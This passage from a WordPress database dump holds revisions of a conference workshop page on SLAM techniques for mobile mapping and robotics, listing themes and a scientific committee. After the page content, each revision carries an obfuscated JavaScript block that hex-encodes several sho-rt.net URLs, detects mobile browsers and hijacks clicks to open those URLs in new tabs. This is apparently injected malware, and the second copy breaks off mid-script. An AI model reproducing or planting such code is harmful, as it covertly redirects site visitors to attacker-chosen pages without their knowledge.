these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:47:58','2022-10-07 20:47:58','',2570,'https://gsw2023.com/?p=2591',0,'revision','',0),
(2592,1,'2022-10-07 20:50:59','2022-10-07 20:50:59','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][dt_portfolio_masonry post_type=\"posts\" layout=\"gradient_rollover\" image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" posts=\"2570\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 